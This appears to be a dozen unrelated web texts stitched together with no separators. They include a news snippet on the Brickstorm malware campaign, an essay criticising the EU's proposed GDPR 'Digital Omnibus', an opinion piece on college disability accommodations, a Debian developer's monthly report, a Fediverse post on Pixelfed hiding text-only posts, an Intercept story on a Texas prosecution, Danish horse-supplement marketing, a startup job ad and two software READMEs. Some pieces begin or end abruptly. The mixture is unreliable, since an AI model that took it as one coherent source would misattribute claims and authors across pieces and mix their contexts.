Today, cybersecurity firm CrowdStrike also linked Brickstorm malware attacks targeting VMware vCenter servers on the networks of U.S. legal, technology, and manufacturing companies throughout 2025 to a Chinese hacking group it tracks as Warp Panda. CrowdStrike observed the same threat group deploying previously unknown Junction and GuestConduit malware implants in VMware ESXi environments.
The joint advisory comes on the heels of a Google Threat Intelligence Group (GTIG) report published in September that described how suspected Chinese hackers used the Brickstorm malware (first documented by Google subsidiary Mandiant in April 2024 ) to gain long-term persistence on the networks of multiple U.S. organizations in the technology and legal sectors.
Google security researchers linked these attacks to the UNC5221 malicious activity cluster, known for exploiting Ivanti zero-days to target government agencies with custom Spawnant and Zipline malware.
Broken IAM isn't just an IT problem - the impact ripples across your whole business.
This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.
Brooklyn-based DJ and immigrant rights and climate activist Thanushka Yakupitiyage , better known as DJ Ushka, builds alternate realities with sets that mix Bollywood and baile funk, bachata, and Shakira.
She performed at this summer's Planet Brooklyn with a soundsystem , a loudspeaker conglomeration that can be heard throughout an entire street party. The practice originated in Kingston, Jamaica, and is typically associated with dancehall and other Caribbean styles of music. (You'll see a lot of them at the West Indian Day Parade .) She told me that the one she used was built by her friend, the musician Anik Khan , in Bangladesh's capital, Dhaka.
Yakupitiyage, who currently works on sustainable policy initiatives at the Surdna Foundation , said she started DJing to be part of queer people of color in New York finding community on the dance floor.
"In 2011, I came into DJing when I was doing immigrant and refugee rights work," Yakupitiyage told me. She is an immigrant herself, originally from Sri Lanka and Thailand, who moved to the U.S. when she was 18 to attend college in Massachusetts. After graduating in 2007, she moved to New York City. "As an immigrant, I've experienced all of the difficulties of what it means to be able to stay in and make New York my home."
As she worked on immigrant support campaigns in the city, she began to see the club as a place of refuge: "I joke that some people go to church or temple, I go to the club."
She quickly realized that while the New York club scene of the 2010s had a dearth of women of color, immigrants, and queer people, that was changing fast. Party producers "with a sort of political analysis based on the issues that I was working on" were popping up, fulfilling, as she put it, "the need for joyful spaces when we live in a really chaotic time."
She cut her teeth at parties like QUE BAJO!? by DJs Uproot Andy and Geko Jones, and queer parties like Azucar; SWEAT, a party run by Khane Kutzwell ; and, eventually Papi Juice, whose organizers she says are now "like family."
Since Yakupitiyage has been working as a multi-disciplinary artist on projects and parties for more than a decade, I asked her what her wildest dreams were for a new era of New York City culture .
"It's very, very difficult to be a full-time artist or DJ in New York," Yakupitiyage said. "I'd like to see the City really think about how they can create opportunities, expand grant opportunities for artists, and incorporate nightlife cultural workers as a part of broader artistic endeavors."
Here's where the DJ who can do it all is partying in the next two weeks:
The European Commission (EC) is considering a “Digital Omnibus” package that would substantially rewrite EU privacy law, particularly the landmark General Data Protection Regulation (GDPR ) . It’s not a done deal, and it shouldn’t be. The GDPR is the most comprehensive model for privacy legislation around the world. While it is far from perfect and suffers from uneven enforcement, complexities and certain administrative burdens, the omnibus package is full of bad and confusing ideas that, on balance, will significantly weaken privacy protections for users in the name of cutting red tape. It contains at least one good idea: improving consent rules so users can automatically set consent preferences that will apply across all sites. But much as we love limiting cookie fatigue, it’s not worth the price users will pay if the rest of the proposal is adopted. The EC needs to go back to the drawing board if it wants to achieve the goal of simplifying EU regulations without gutting user privacy. Let’s break it down.
Changing What Constitutes Personal Data
The digital package is part of a larger Simplification Agenda to reduce compliance costs and administrative burdens for businesses, echoing the Draghi Report’s call to boost productivity and support innovation. Businesses have been complaining about GDPR red tape since its inception, and new rules are supposed to make compliance easier and turbocharge the development of AI in the EU. Simplification is framed as a precondition for firms to scale up in the EU, ironically targeting laws that were also argued to promote innovation in Europe. It might also stave off tariffs the U.S. has threatened to levy, thanks in part to heavy lobbying from Meta and tech lobbying groups.
The most striking proposal seeks to narrow the definition of personal data, the very basis of the GDPR. Today, information counts as personal data if someone can reasonably identify a person from it, whether directly or by combining it with other information.
The proposal jettisons this relatively simple test in favor of a variable one: whether data is “personal” depends on what a specific entity says it can reasonably do or is likely to do with it. This selectively restates part of a recent ruling by the EU Court of Justice but ignores the multiple other cases that have considered the issue.
This structural move toward
entity specific standards
will create massive legal and practical confusion, as the same data
could be treated as personal for some
actors
but not for others. It also creates a path for companies to avoid established GDPR obligations via operational restructuring to separate identifiers from other information—a change in paperwork rather than in actual identifiability. What’s more, it will be up to the Commission, a political executive body, to define what counts as unidentifiable pseudonymized data for certain entities.
Privileging AI
In the name of facilitating AI innovation, which often relies on large datasets in which sensitive data may residually appear, the digital package treats AI development as a “legitimate interest,” which gives AI companies a broad legal basis to process personal data, unless individuals actively object. The proposals gesture towards organisational and technical safeguards but leave companies broad discretion.
Another amendment
would create a new exemption that allows even
sensitive personal data
to be used for AI systems under some circumstances. This is not a blanket permission: “organisational and technical measures” must be taken to avoid collecting or processing such data, and proportionate efforts must be taken to remove them from AI models or training sets where they appear. However, it is unclear what will count as an appropriate or proportionate measures.
Taken together with the new personal data test, these AI privileges mean that core data protection rights, which are meant to apply uniformly, are likely to vary in practice depending on a company’s technological and commercial goals.
And it means that AI systems may be allowed to process sensitive data even though non-AI systems that could pose equal or lower risks are not allowed to handle
it
.
A Broad Reform Beyond the GDPR
There are additional adjustments, many of them troubling, such as changes to rules on automated-decision making (making it easier for companies to claim it’s needed for a service or contract), reduced transparency requirements (less explanation about how users’ data are used), and revised data access rights (supposed to tackle abusive requests). An extensive analysis by NGO noyb can be found
here
.
Moreover, the digital package reaches well beyond the GDPR, aiming to streamline Europe’s digital regulatory rulebook, including the e-Privacy Directive, cybersecurity rules, the AI Act and the Data Act. The Commission also launched “reality
checks
” of other core legislation, which suggests it is eyeing other mandates.
Browser Signals and Cookie Fatigue
There is one proposal in the Digital Omnibus that actually could simplify something important to users: requiring online interfaces to respect automated consent signals, allowing users to automatically reject consent across all websites instead of clicking through cookie popups on each. Cookie popups are often designed with “dark patterns” that make rejecting data sharing harder than accepting it. Automated signals can address cookie banner fatigue and make it easier for people to exercise their privacy rights.
While this proposal is a step forward, the
devil is in the details:
First, the exact format of the automated consent signal will be determined by technical standards organizations where Big Tech companies have historically lobbied for standards that work in their favor. The amendments should therefore define minimum protections that cannot be weakened later.
Second, the provision takes the important step of requiring web browsers to make it easy for users sending this automated consent signal, so they can opt-out without installing a browser add-on.
However, mobile operating systems are excluded from this latter requirement, which is a significant oversight. People deserve the same privacy rights on websites and mobile apps.
Finally, exempting media service providers altogether creates a loophole that lets them keep using tedious or deceptive banners to get consent for data sharing. A media service’s harvesting of user information on its website to track its customers is distinct from news gathering, which should be protected.
A Muddled Legal Landscape
The Commission’s
use of the "Omnibus" process is meant to streamline lawmaking by bundling multiple changes. An earlier
proposal
kept the GDPR intact, focusing on easing the record-keeping obligation for smaller businesses—a far less contentious measure. The new digital package instead moves forward with thinner evidence than a substantive structural reform would require, violating basic
Better Regulation
principles, such as coherence and proportionality.
The result is the opposite of
“simple.” The proposed delay of the high-risk requirements under the AI Act to late 2027—part of the omnibus package—illustrates this: Businesses will face a muddled legal landscape as they must comply with rules that may soon be paused and later revived again.
This sounds like "complification” rather than simplification.
The Digital Package Is Not a Done Deal
Evaluating existing legislation is part of a sensible legislative cycle and clarifying and simplifying complex process and practices is not a bad idea. Unfortunately, the digital package misses the mark by making processes even more complex, at the expense of personal data protection.
Simplification doesn't require tossing out digital rights. The EC should keep that in mind as it launches its reality check of core legislation such as the Digital Services Act and Digital Markets Act, where tidying up can too easily drift into a verschlimmbessern , the kind of well-meant fix that ends up resembling the infamous ecce homo restoration .
The students at America's elite universities are supposed to be the smartest, most promising young people in the country. And yet, shocking percentages of them are claiming academic accommodations designed for students with learning disabilities.
In an article published this week in The Atlantic, education reporter Rose Horowitch lays out some shocking numbers. At Brown and Harvard, 20 percent of undergraduate students are disabled. At Amherst College, that's 34 percent. At Stanford University, it's a galling 38 percent. Most of these students are claiming mental health conditions and learning disabilities, like anxiety, depression, and ADHD.
Obviously, something is off here. The idea that some of the most elite, selective universities in America—schools that require 99th percentile SATs and sterling essays—would be educating large numbers of genuinely learning disabled students is clearly bogus. A student with real cognitive struggles is much more likely to end up in community college, or not in higher education at all, right?
The professors Horowitz interviewed largely back up this theory. "You hear 'students with disabilities' and it's not kids in wheelchairs," one professor told Horowitch. "It's just not. It's rich kids getting extra time on tests." Talented students get to college, start struggling, and run for a diagnosis to avoid bad grades. Ironically, the very schools that cognitively challenged students are most likely to attend—community colleges—have far lower rates of disabled students, with only three to four percent of such students getting accommodations.
To be fair, some of the students receiving these accommodations do need them. But the current language of the Americans with Disabilities Act (ADA) allows students to get expansive accommodations with little more than a doctor's note.
While some students are no doubt seeking these accommodations as semi-conscious cheaters, I think most genuinely identify with the mental health condition they're using to get extra time on tests. Over the past few years, there's been a rising push to see mental health and neurodevelopmental conditions as not just a medical fact, but an identity marker. Will Lindstrom, the director of the Regents' Center for Learning Disorders at the University of Georgia, told Horowitch that he sees a growing number of students with this perspective. "It's almost like it's part of their identity," Lindstrom told her. "By the time we see them, they're convinced they have a neurodevelopmental disorder."
What's driving this trend? Well, the way conditions like ADHD, autism, and anxiety get talked about online—the place where most young people first learn about these conditions—is probably a contributing factor. Online creators tend to paint a very broad picture of the conditions they describe. A quick scroll of TikTok reveals creators labeling everything from always wearing headphones , to being bad at managing your time , to doodling in class as a sign that someone may have a diagnosable condition. According to these videos, who isn't disabled?
The result is a deeply distorted view of "normal." If ever struggling to focus or experiencing boredom is a sign you have ADHD, the implication is that a "normal," nondisabled person has essentially no problems. A "neurotypical" person, the thinking goes, can churn out a 15-page paper with no hint of procrastination, maintain perfect focus during a boring lecture, and never experience social anxiety or awkwardness. This view is buffeted by the current way many of these conditions are diagnosed. As Horowitch points out, when the latest issue of the DSM , the manual psychiatrists use to diagnose patients, was released in 2013, it significantly lowered the bar for an ADHD diagnosis. When the definition of these conditions is set so liberally, it's easy to imagine a highly intelligent Stanford student becoming convinced that any sign of academic struggle proves they're learning disabled, and any problems making friends are a sign they have autism.
Risk-aversion, too, seems like a compelling factor driving bright students to claim learning disabilities. Our nation's most promising students are also its least assured. So afraid of failure—of bad grades, of a poorly-received essay—they take any sign of struggle as a diagnosable condition. A few decades ago, a student who entered college and found the material harder to master and their time less easily managed than in high school would have been seen as relatively normal. Now, every time she picks up her phone, a barrage of influencers is clamoring to tell her this is a sign she has ADHD. Discomfort and difficulty are no longer perceived as typical parts of growing up.
In this context, it's easy to read the rise of academic accommodations among the nation's most intelligent students as yet another manifestation of the risk-aversion endemic in the striving children of the upper middle class. For most of the elite-college students who receive them, academic accommodations are a protection against failure and self-doubt. Unnecessary accommodations are a two-front form of cheating—they give you an unjust leg-up on your fellow students, but they also allow you to cheat yourself out of genuine intellectual growth. If you mask learning deficiencies with extra time on texts, soothe social anxiety by forgoing presentations, and neglect time management skills with deadline extensions, you might forge a path to better grades. But you'll also find yourself less capable of tackling the challenges of adult life.
My Debian contributions this month were all sponsored by Freexian. I had a bit less time than usual, because Freexian collaborators gathered in Marseille this month for our yearly sprint, doing some planning for next year.
You can also support my work directly via Liberapay or GitHub Sponsors .
I began preparing for the second stage of the GSS - API key exchange package split (some details have changed since that message). It seems that we’ll need to wait until Ubuntu 26.04 LTS has been released, but that’s close enough that it’s worth making sure we’re ready. This month I just did some packaging cleanups that would otherwise have been annoying to copy, such as removing support for direct upgrades from pre-bookworm. I’m considering some other package rearrangements to make the split easier to manage, but haven’t made any decisions here yet.
This also led me to start on a long-overdue bug triage pass, mainly consisting of applying usertags to lots of our open bugs to sort them by which program they apply to, and also closing a few that have been fixed, since some bugs will eventually need to be reassigned to GSS - API packages and it would be helpful to make them easier to find. At the time of writing, about 30% of the bug list remains to be categorized this way.
I upgraded these packages to new upstream versions:
I packaged django-pgtransaction and backported it to trixie, since we plan to use it in Debusine; and I adopted python-certifi for the Python team.
I fixed or helped to fix several other build/test failures:
I fixed a couple of other bugs:

PyTogether
Google docs for Python. A fully browser-based collaborative Python IDE with real-time editing, chat, and visualization.
When starting out in programming, many beginners find traditional IDEs overwhelming: full of plugins, extensions, configuration steps, paywalls, and complex UIs. PyTogether removes these barriers by offering a lightweight, distraction-free environment where you can focus on writing Python code right away.
The platform is designed for learning, teaching, and pair programming , making it ideal for classrooms, coding clubs, or quick collaborations.
Note: PyTogether is intended for educational purposes and beginner use. It is not optimized for large-scale production development.
While there are many online IDEs (Replit, Jupyter, Google Colab, etc.), PyTogether is built with a different goal: simplicity first .
Unlike production-grade IDEs, PyTogether prioritizes ease of use and collaboration for learners rather than advanced features.
Running PyTogether locally is a simple two-step process. Run the following commands from the project root:
# 1. Install all dependencies (automatically does it for root and frontend) npm install # 2. Start the servers npm run dev
This will install all required packages and run the backend container and start the frontend. It should take around 2-5 minutes on initial launch. The frontend will be live on http://localhost:5173 . You can do CTRL+C to stop the program/containers.
Note Two superusers are created automatically:
- Email:
test1@gmail.com- Email:
test2@gmail.comBoth have the password
testtest. You can log in with them on the frontend.
You may also adjust the settings in backend/backend/settings/dev.py
Jawad Rizvi
Applied Mathematics & Computer Engineering student at Queen's University.
by Ploum on 2025-12-04
In January 2025, I became aware that there was a real problem with Pixelfed, the "Instagram inspired Fediverse client". The problem is threatening the whole Fediverse. As Pixelfed received a lot of media attention, I choose to wait. In March 2025, I decided that the situation was quieter and wrote an email to Dansup, Pixelfed’s maintainer, with an early draft of this post. Dan’s promptly replied, in a friendly tone. But didn’t want to acknowledge the problem which I’ve confirmed many times with Pixelfed users. I want to bring the debate on the public place. If I’m wrong, I will at least understand why. If Dan is wrong on this very specific issue, we will at least open the debate.
This post will be shared to my Fediverse audience through my @ploum@mamot.fr Mastodon account. But Pixelfed users will not see it. Even if they follow me, even if many people they follow boost it. Instead, they will see a picture of my broken keyboard that I posted a week ago.
That’s because, despite its name, Pixelfed is NOT a true Fediverse application. It does NOT respect the ActivityPub protocol. Any Pixelfed user following my @ploum@mamot.fr will only see a very small fraction of what I post. They may not see anything from me for months.
But why? Simple! The Pixelfed app has unilaterally decided not to display most Fediverse posts for the arbitrary reason that they do not contain a picture.
This is done on purpose and by design. Pixelfed is designed to mimic Instagram. Displaying text without pictures was deliberately removed from the code (it was possible in previous versions) in order to make the interface prettier.
This is unlike a previous problem where Pixelfed would allow unauthorised users to read private posts from unknowing fediverse users, which was promptly fixed.
In this case, we are dealing with a conscious design decision by the developers. Being pretty is more important than transmitting messages.
Technically, this means that a Pixelfed user P will think that he follows someone but will miss most of the content. On the opposite, the sender, for example a Mastodon user M, will believe that P has received his message because M follows him.
This is a grave abuse of the protocol: messages are silently dropped. It stands against everything the Fediverse is trying to do: allow users to communicate. My experience with open protocols allows me to say that it is a critical problem and that it cannot be tolerated. Would you settle for a mail provider which silently drop all emails you receive if they contain the letter "P"?
The principle behind a communication protocol is to create trust that messages are transmitted. Those messages could, of course, be filtered by the users but those filters should be manually triggered and always removable. If a message is not delivered, the sender should be notified.
In 2025, I’ve read several articles about people trying the Fediverse but leaving it because "there’s not enough content despites following lot of people". Due to the Pixelfed buzz in January, I’m now wondering: "how many of those people were using Pixelfed and effectively missing most of the Fediverse content?"
I cannot stress enough how important that problem is.
If Pixelfed becomes a significant actor, its position will gravely undermine the ActivityPub protocol to the point of making it meaningless.
Imagine a new client, TextFed, that will never display posts with pictures. That makes as much sense as the opposite. Lots of people, like me, find pictures disturbing and some people cannot see pictures at all. So TextFed makes as much sense as Pixelfed. Once you have TextFed, you realise that TextFed and PixelFed users can follow each other, they can comment on post from Mastodon users, they can exchange private messages but they will never be able to see post from each other.
For any normal users, there’s no real way to understand that they miss some messages. And even if you do, it is very hard to find that the cause is the absence of pictures in them make them "not pretty enough" to Pixelfed developers. Worse of all : some Mastodon posts do contain a picture but are not displayed in Pixelfed. That’s because the picture is from a link preview and was not manually uploaded. Try to explain that to your friends that reluctantly followed you on the Fediverse. Have a look at any Mastodon account and try to guess which posts will we showed to the Pixelfed followers!
That’s not something any normal human is supposed to understand. For Pixelfed users, there’s no way to see they are missing on some content. For Mastodon users, there’s no way to see that some of their audience is missing on some content.
With the trust in the protocol broken, people will revert to create Mastodon accounts to follow Mastodon, Pixelfed accounts to follow Pixelfed and Textfed to follow Textfed. Even if it is not 100% needed, that’s the first intuition. It’s already happening around me: I’ve witnessed multiple people with a Mastodon account creating a Pixelfed account to follow Pixelfed users. They do this naturally because they were used to do that with Twitter and Instagram.
Congratulations, you have successfully broken ActivityPub and, as a result, the whole Fediverse. What Meta was not able to do with Threads, the Fediverse did it to itself. Because it was prettier.
Now, imagine for a moment that Pixelfed takes off (which is something I wish for and would be healthy for the Fediverse) and that interactions are strong between Mastodon users and Pixelfed users (also something I wish for). I let you imagine how many bug reports developers will receive about "some posts are not appearing in my followers timeline" or "not appearing in my timeline".
This will result in a heavy pressure for Pixelfed devs to implement text-only messages. They will, at some point, be forced to comply, having eroded trust in the Fediverse for nothing.
Once a major actor in a decentralised network starts to mess with the protocol, there are only two possible output: either that actor lose steam or that actor becomes dominant enough to impose its own vision of the protocol. In fact, there’s a third option: the whole protocol becomes irrelevant because nobody trust it anymore.
But imagine that Pixelfed is now so important that they can stick to their guns and refuse to display text messages.
Well, there’s a simple answer: every other fediverse software will now add an image with every post. Mastodon will probably gain a configurable "default picture to attach to every post so your posts are displayed in Pixelfed".
And now, without having formerly formalised it, the ActivityPub protocol requires every message to have a picture.
That’s how protocol works. It already happened: that’s how all mail clients started to implement the winmail.dat bug.
Sysadmins handling storage and bandwidth for the Fediverse thank you in advance.
Fortunately, we are not there yet. Pixelfed is still brand new. It still can go back to displaying every message an end user expect to see when following another Fediverse user.
I stress out that it should be by default, not a hidden setting. Nearly all Pixelfed users I’ve asked were unaware of that problem. They thought that if they follow someone on the Fediverse, they should, by default, see all their public posts.
There’s no negotiation. No warning on the Pixelfed website will be enough. In a federated communication system, filters should be opt-in. If fact, that’s what older versions of Pixelfed were doing.
But, while text messages MUST be displayed by default (MUST as in RFC), they can still me displayed as less important. For example, one could imagine having them smaller or whatever you find pretty as long as it is clear that the message is there. I trust Pixelfed devs to be creative here.
The Fediverse is growing. The Fediverse is working well. The Fediverse is a tool that we urgently need in those trying times. Let’s not saw off the branch on which we stand when we need it the most.
UPDATE: Dansup, Pixelfed Creator, replied the following on Mastodon:
We are working on several major updates, and while I believe that Pixelfed should only show photo posts, that decision should be up to each user, which we are working to support.
I’m Ploum , a writer and an engineer. I like to explore how technology impacts society. You can subscribe by email or by rss . I value privacy and never share your adress.
I write science-fiction novels in French . For Bikepunk , my new post-apocalyptic-cyclist book, my publisher is looking for contacts in other countries to distribute it in languages other than French. If you can help, contact me !
For five months, Daniel Sanchez Estrada was the prisoner of a government that has branded him an “ Antifa Cell operative .” He was accused of moving a box of anarchist zines from one suburb of Dallas to another after a protest against U.S. Immigration and Customs Enforcement.
On the day before Thanksgiving, he was released without warning or explanation. He walked out to a jail parking lot relishing the fresh air — and watching over his shoulder.
During the week that followed, Sanchez Estrada savored his time with family members and worried that his release might have been an accident. Apparently, he was right.
“I just have to go through this process. It’s necessary to show that I’m not the person they say I am.”
On Thursday, Sanchez Estrada turned himself in to await a trial that could be months away.
It was another swerve in the case of a man who has been demonized by the federal government for actions he took after a protest against Donald Trump’s immigration crackdown . Civil liberties advocates have decried the case against him as “guilt by literature.” (The U.S Attorney’s Office for the Northern District of Texas declined to comment and the Federal Bureau of Prisons did not immediately respond to a request.)
In a Wednesday night interview during his final hours of freedom, Sanchez Estrada said the decision to voluntarily surrender himself was gut-wrenching.
“As scary as it is, I’m innocent,” he said. “I just have to go through this process. It’s necessary to show that I’m not the person they say I am. I’m not fleeing. I’m not hiding. Because I’m innocent. I haven’t done anything.”
Sanchez Estrada spoke to The Intercept outside an ice cream shop in an upscale shopping mall in Fort Worth, Texas. He was set to turn himself back into jail 16 hours after the interview — but before that, he was treating his 12-year-old stepdaughter to sweets during his first meeting with her as a free man since his arrest in July.
Prosecutors allege that Sanchez Estrada’s wife, Maricela Rueda, attended a chaotic protest outside ICE’s Prairieland Detention Center on July 4 that ended with a police officer wounded by gunfire. A separate defendant is the sole person accused of firing a gun at the officer.
The gathering outside the Alvarado, Texas, detention center happened in the context of huge rise in the number of immigrants detained under Trump , from 39,000 in January to 65,000 in November, which has been accompanied by reports of dire conditions inside .
Supporters of the Prairieland defendants say the protesters hoped to cause a ruckus with fireworks in a show of solidarity. The government has accused members of what it dubs the “North Texas antifa cell” of rioting and attempted murder.
No one claims that Sanchez Estrada was present at the protest. Instead, he is accused of moving anarchist zines from his parents’ house to another residence near Dallas on July 6 after Rueda called him from jail. Sanchez Estrada was arrested when the move was spotted by an FBI surveillance team, according to the government.
“My charge is allegedly having a box containing magazine ‘zines,’ books, and artwork.”
Prosecutors said the zines contained “anti-law enforcement, anti-government and anti-Trump sentiments.” In a statement made outside of his interview, Sanchez Estrada said that possession of such items is clearly protected by the First Amendment.
“My charge is allegedly having a box containing magazine ‘zines,’ books, and artwork,” Sanchez Estrada said. “Items that should be protected under the First Amendment ‘freedom of speech.’ If this is happening to me now, it’s only a matter of time before it happens to you.”
Civil liberties groups such as the Freedom of the Press Foundation have denounced his case as “ guilt by literature.” They warn that his could be the first of many such prosecutions in the wake of a presidential memo from Trump targeting “antifa” and other forms of “ anti-Americanism .”
The purported “North Texas antifa cell” has been cited by FBI Director Kash Patel and others as a prime example of a supposed surge in the number of attacks on ICE officers — although a recent Los Angeles Times analysis found that unlike the incident in Texas, most of those alleged attacks resulted in no injury.
Sanchez Estrada faces up to 20 years on counts of corruptly concealing a document or record and conspiracy to conceal documents. The stakes are higher for him than other defendants because he is a green card holder, which ICE spotlighted in a social media post that included his picture and immigration history.
Sanchez Estrada also worries about the fate of his wife, who faces life imprisonment if convicted. She pleaded not guilty in an arraignment Wednesday. The case is currently set for trial on January 20.
“I want to be very clear. I did not participate. I was not aware nor did I have any knowledge about the events that transpired on July 4 outside the Prairieland Detention Center,” Sanchez Estrada said in his statement. “My feeling is that I was only arrested because I’m married to Mari Rueda, who is being accused of being at the noise demo showing support to migrants who are facing deportation under deplorable conditions.”
Sanchez Estrada said that he spent his months in jail anguishing over how his stepdaughter would be affected and how his parents, for whom he is the primary supporter, would make ends meet.
A nature lover who peppers his speech with references to “the creator,” for Sanchez Estrada one of the toughest things about being in jail was not being able to breathe fresh air or watch the sun set.
He said he was immediately suspicious when jail officers told him that he was being released.
“I thought they would be waiting in the parking lot to arrest me.”
“You normally would assume the worst when you’re in there. I just did not believe them. I thought they would be waiting in the parking lot to arrest me,” he said.
Soon, however, Sanchez Estrada was eating vegan tacos and spending time with friends and family.
“It is something just beautiful to see — everyone rooting for you,” he said.
He fears what could happen when he returns to custody. Still, he will have a reminder of his brief return to life on the outside: freshly inked tattoos of a raccoon and an opossum.
“They’ve been here even before people,” he said. “They’re wild animals, and they’re beautiful.”
Update: December 4, 2025, 12:58 p.m. ET
This story has been updated to reflect that, after publication, the U.S Attorney’s Office for the Northern District of Texas declined to comment.
Sandra stiftede Lindely Stables i 2019, men hendes ridekarriere begyndte for alvor i 2002 hvor hun blev optaget på det Danske Pony Landshold, hvor hun var med til at vinde guld ved de Nordiske Mesterskaber. I 2005 repræsenterede hun Danmark til EM i Springning på hest.
Hun har deltaget i mange landsstævner, samt internationale stævner op til 145cm klasser.
Udover at være en dygtig springrytter der ofte selv stiller op, har hun specialiseret sig i tilridning, træning, avl & ernæring, alt på hestens præmisser og i hestens tempo.
I 2024 fik hendes hjemmeavlede Baldur alvorlige problemer med nervøsitet, særligt i forbindelse med stævner. Samtlige produkter, træningsmetoder, behandlinger og råd fra dyrlægen blev afprøvet uden effekt. Det var først da hun faldt over det hollandske Librium , at koden blev knækket.
Librium viste sig at være flydende sindsro for Baldur, der hurtigt fik sin store ride-/stævne glæde tilbage!
Som konsekvens indledte Sandra et samarbejde med Lau Bjørn Jensen og sammen blev de importører af hele Prenimals Prequine serie af tilskud til heste i den højeste kvalitet. Samtlige tilskud bidrager enten til hestens helbred eller livskvalitet og missionen er klar:
Alle heste skal have mulighed for at leve deres bedste hesteliv.
Converge is building the definitive Growth OS : We help DTC Growth teams understand which marketing efforts drive profitable growth . We are the only platform combining best-in-class tracking with blended reporting and multi-touch attribution.
Our unique positioning has led to rapid growth in both number and size of customers. One of the secrets of our growth is that we invest heavily in customer success . Whereas our competitors see success as a cost center, we take pride in delivering expert martech and marketing reporting support throughout the entire customer lifecycle and we compensate accordingly .
Our strategy is paying off, with 200+ paying customers (including some of the most famous DTC brands) and strong investor backing. We are now looking for a senior Technical Customer Success Manager to help us scale to $10M+ ARR .
Be a marketing measurement expert : Advise customers on attribution, conversion tracking, and reporting strategies, positioning yourself as a trusted technical partner.
Technical support : Investigate and resolve conversion tracking and attribution issues reported through all channels, including email, Slack and in-app.
Onboard new customers : Own the customer onboarding end-to-end, driving them from initial implementation to real and lasting success.
Drive renewals : Take full ownership of renewal conversations, mitigating churn risk and implementing proactive retention strategies.
Champion customer needs : Surface trends and insights from collected customer feedback to the team at large to inform product roadmap.
Activate: Maximize the adoption of our product features and provide proactive, regular recommendations to get more out of the platform.
Expand customer contracts : Identify and execute expansion opportunities to increase account value.
Lead strategic projects : Improve the support experience and feature adoption.
Have strong martech experience : Google Tag Manager, Meta Events Manager, Google Consent Mode and other pieces of the martech stack have no secrets for you.
Are curious and technical : You love understanding complex products deeply. Bonus points if you already love JS debugging, sifting through network requests or reasoning over attribution logic.
Thrive in ambiguity : You enjoy building processes from scratch and figuring things out without a playbook.
Are commercially minded : You know how to uncover customer needs and tie solutions to real business value.
Have advertising experience: You speak the language of a growth team, and have experience with Ads Managers, attribution and creative strategy.
Do not want to become an expert : Our customers choose us because we deeply understand their technical challenges.
Prefer certainty over upside : There are no rigid and limited responsibilities here - we grant a lot of agency and expect a lot of accountability.
Don't like working hard : This role demands more commitment and agency than a typical success role.
Prefer remote over in-person : We believe being in-person helps us move faster.
Compensation: $155k - $217k + equity: 0.1% - 0.25%.
Career-defining opportunity to build the U.S. success function and work with the world's best DTC growth teams.
Private health, dental, and vision insurance.
Pension & 401k contributions.
Opportunity to work on a complex product that customers love - 35% of our users use us daily (!)
Application : We're looking to see how your skills and experience align with our needs.
Intro interview (30-min): Our goal is to learn more about what you are looking for in your next role, explore your motivations to join our team, why you would be a great fit, and answer questions about us.
Culture interview (45-min): We will walk through your experience and background in detail.
Case interview (1 hour): We will simulate a real customer situation.
Offer If everyone’s aligned, we’ll move quickly to make you an offer.
(*) can be done in 2 days, just flag to us that you want to do it fast.
We operate a >$1M ARR business with >200 customers with a team of just 9 people .
Why you should care:
You will not find a startup with this level of product-market-fit where you can join as employee #10.
We compete with Segment, Fivetran, Google Tag Manager, Rockerbox, Looker, just to name a few.
Why you should care:
Other startups give you ownership of a feature. At Converge, you get ownership over an entire product .
Converge sees 35% of its users daily , while this is only 13% for the average SaaS company.
Why you should care:
Our customers will be excited by every feature you ship, and your impact will be felt immediately .
We collect around 20M customer interactions per day and process ~$3B in GMV annually .
Why you should care:
Even though you join early, this job comes with real engineering challenges .
All co-founders have written code that has run in production as part of Converge.
We closed our first publicly traded company during our YC batch from our living room in San Francisco.
Thomas and Tiago (Founding Engineer) worked together when Thomas was just an intern.
Michel (Customer Success) was responsible for most of the incoming Converge Support tickets in his previous job as a freelance tracking consultant.
Thomas and Jan were best friends in high school, and Jan and Jerome met in their first year of college.
This is the code I currently use to drive my volumetric displays .
It supports two closely related devices which are configured in the
src/driver/gadgets
directory:
Rotovox has a higher vertical resolution and better horizontal density; Vortex is brighter and has a higher refresh rate.
The 3D printable parts for Vortex are available here .
This code was originally written for a single display, and the device specific code was later somewhat abstracted out to support a second similar gadget. There are assumptions about the hardware that are pretty well baked in:
The GPIO mappings and panel layout are defined in
src/driver/gadgets/gadget_<name>.h
. GPIO is via memory mapped
access - if you're using a different model of Pi you'll need to change
BCM_BASE
in the GPIO code. I haven't tested
this, and you should probably assume it doesn't work.
Input is via a bluetooth gamepad - I've been using an Xbox controller, and the input system is based on the default mapping for that.
Audio out is also via bluetooth. I haven't had success with the higher quality codecs, but the headset protocol works.
There are two parts to this code - the driver, which creates a voxel buffer in shared memory and scans its contents out in sync with rotation, and the client code which generates content and writes it into the voxel buffer. Both driver and client code are designed to run on the same device, a Raspberry Pi embedded in the hardware and spinning at several hundred RPM. There is a demo included in the Python directory which streams point clouds from a PC over wifi to the device, but fundamentally it's designed as a self contained gadget, like an alternate timeline Vectrex. A bluetooth gamepad is used to control the demos.
├── src
│ ├── driver
│ │ ├── gadgets -- the different volumetric display configurations
│ │ │ └──
│ │ └── vortex.c -- driver code - creates a voxel buffer in shared memory,
│ │ and handles scanning it out to the led panels in sync with
│ │ the rotation
│ ├── simulator
│ │ └── virtex.c -- software simulator - presents the same voxel buffer as
│ │ the driver would, but renders the contents into an X11 window
│ │
│ ├── multivox -- front end / launcher for the various volumetric toys
│ │ └──
│ ├── platform -- common client code
│ │ └──
│ └── toys -- a collection of volumetric demos using the shared voxel buffer
│ ├── eighty -- multiplayer light cycles
│ ├── fireworks.c -- cheesy first demo
│ ├── flight.c -- some kind of 70s scifi thing
│ ├── tesseract.c -- a 4D cubube
│ ├── viewer.c -- viewer for .obj and .png files
│ └── zander -- lander/zarch/virus-esque
├── python
│ ├── calibration.py -
│ ├── grid.py -- some pattern generators, useful when calibrating the device
│ ├── colourwheel.py -
│ ├── obj2c.py -- tool for embedding .obj models in a header file
│ ├── pointvision.py -- receive point clouds streamed from vortexstream.py
│ └── vortexstream.py -- stream point clouds to pointvision.py
└── README.md -- you are here
On the Raspberry Pi, clone the repository:
git clone https://github.com/AncientJames/multivox.git
Configure the project for your hardware:
cd multivox
mkdir build
cd build
cmake -DMULTIVOX_GADGET=vortex ..
cmake --build .
First, the driver has to be running:
When invoked from the command line it periodically outputs profiling information (frame rate, rotation rate), and accepts keyboard input for various diagnostics:
